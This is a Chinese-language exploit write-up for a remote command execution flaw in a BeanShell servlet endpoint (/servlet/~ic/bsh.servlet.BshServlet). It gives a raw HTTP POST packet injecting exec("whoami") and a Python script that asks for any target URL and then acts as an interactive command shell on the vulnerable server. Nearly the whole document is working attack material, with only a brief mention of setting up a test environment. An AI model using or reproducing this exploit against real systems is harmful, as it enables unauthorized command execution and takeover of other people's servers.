自行搭建测试环境
漏洞路径
/servlet/~ic/bsh.servlet.BshServlet
漏洞利用
数据包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.88:8080/servlet/~ic/bsh.servlet.BshServlet
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
bsh.script=exec%28%22whoami%22%29%3B%0D%0A
|
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| import requests
import re
requests.packages.urllib3.disable_warnings()
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def Getshell(urllist,cmd):
url = urllist+'/servlet//~ic/bsh.servlet.BshServlet'
burp0_data = {"bsh.script": "exec(\"%s\")" % cmd}
nclist = requests.post(url,data=burp0_data,proxies=proxy,verify=False)
if 'BeanShell' in nclist.text or nclist.status_code == 200:
result = re.findall(r'<pre>((.|\s)*)</pre>', nclist.text)
if len(result) == 0:
ll = 'whoami'
print('未读取到命令结果')
Getshell(urllist, ll)
result = result[0][0]
index_start = result.index("</pre>")
result = result[0: index_start]
print(result)
print('输入下条命令活输入T退出')
print('------------------------------------------------------------------------\n')
cmdlist = input("===>")
if cmdlist == 'T':
exit(0)
else:
Getshell(urllist,cmdlist)
else:
print('未找到漏洞页面请手动访问 /servlet//~ic/bsh.servlet.BshServlet 进行确认')
if __name__ == '__main__':
print('------------------------------------------------------------------------\n')
url = input('请输入url-格式为:https://xx.xx.xx.xx: ')
print('------------------------------------------------------------------------\n')
cmdsr = input('输入需要执行的命令:')
print('------------------------------------------------------------------------\n')
Getshell(url,cmdsr)
|
